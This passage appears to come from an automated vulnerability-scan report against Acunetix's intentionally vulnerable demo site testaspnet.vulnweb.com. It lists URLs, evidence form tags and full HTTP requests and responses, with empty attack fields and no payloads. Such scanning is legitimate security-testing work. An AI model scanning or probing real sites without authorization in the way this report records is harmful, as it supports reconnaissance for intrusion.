scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1">
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Signup.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
